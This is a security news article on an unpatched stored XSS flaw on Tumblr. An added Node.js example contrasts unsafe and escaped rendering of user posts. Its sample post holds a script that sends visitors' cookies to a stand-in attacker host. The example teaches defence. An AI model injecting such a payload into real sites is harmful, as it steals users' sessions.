Tumblr haunted by stored (persistent) XSS flaw

Summary: Tumblr users are sitting ducks for cookie theft, malicious site redirection and script execution attacks.

A security researcher has posted evidence of a serious cross-site scripting vulnerability on Tumblr, the popular micro-blogging site used by millions.

Technical details on the flaw, described as a stored (persistent) XSS issue, are being withheld by Riyaz Walikar, the researcher who found it.


Walikar said he disclosed the issue to Tumblr on June 25, 2012, but the vulnerability still exists, putting millions of web surfers at risk of malicious hacker attacks.

"XSS can cause a lot of serious problems. An attacker can steal cookies, redirect users to fake or malicious sites, control a user's browser using automated frameworks like BeEF and download and execute exploits on the victim's computer. Stored XSS is even more dangerous since the script is stored on the server and is executed every time a user visits an infected page," Walikar warned in a blog post that discusses the flaws.
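The mechanism Walikar describes, a script that persists on the server and runs for every visitor, is easier to see in code. The following Node.js snippet is an added illustration, not code from Tumblr, from the researcher's post or from the withheld bug report: it renders a stored post first by concatenating the body into HTML (the vulnerable pattern behind stored XSS) and then with contextual output encoding. The attacker host `attacker.example`, the post record, the in-memory store and the helper names are all constructed for the example.

```javascript
// Added illustration of stored XSS (not Tumblr's code, not the withheld bug).
// A post body submitted by an attacker is persisted, then rendered into a
// page for every later visitor: unescaped (vulnerable) and escaped (hardened).

// Constructed sample: the "post" an attacker submits. In a stored XSS it is
// saved server-side and executes in the browser of everyone who views it.
const ATTACKER_POST = {
  author: 'mallory',
  body: '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>',
};

// Minimal in-memory store standing in for the site's database.
const posts = [];
function savePost(post) {
  posts.push(post);
  return posts.length;
}

// Vulnerable: the stored body is concatenated straight into the markup,
// so any tag inside it becomes part of the page.
function renderUnsafe(post) {
  return `<article><h2>${post.author}</h2><div>${post.body}</div></article>`;
}

// Encode the characters that can break out of an HTML text context.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened: every untrusted value is encoded for the context it lands in.
function renderSafe(post) {
  return `<article><h2>${escapeHtml(post.author)}</h2><div>${escapeHtml(post.body)}</div></article>`;
}

// Crude check, used only to show the difference between the two renderers:
// does the rendered markup contain a real (unencoded) script element?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Defence in depth for the cookie-theft scenario in the quote: HttpOnly hides
// the session token from document.cookie even if a script does run; Secure
// and SameSite limit exposure in transit and in cross-site requests.
function sessionCookieHeader(sessionId) {
  return `session=${sessionId}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

savePost(ATTACKER_POST);
for (const p of posts) {
  console.log('unsafe render carries the payload:', containsScriptTag(renderUnsafe(p))); // true
  console.log('safe render carries the payload:  ', containsScriptTag(renderSafe(p)));   // false
}
```

Output encoding is the fix; the HttpOnly cookie flag only narrows the damage, since a script that still runs can issue requests with the victim's session from inside the page, which is exactly what browser-control frameworks such as BeEF rely on.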

The blog post contains two screenshots to demonstrate the XSS flaws.




Ryan Naraine is a journalist and social media enthusiast specializing in Internet and computer security issues. He is currently security evangelist at Kaspersky Lab, an anti-malware company with operations around the globe.
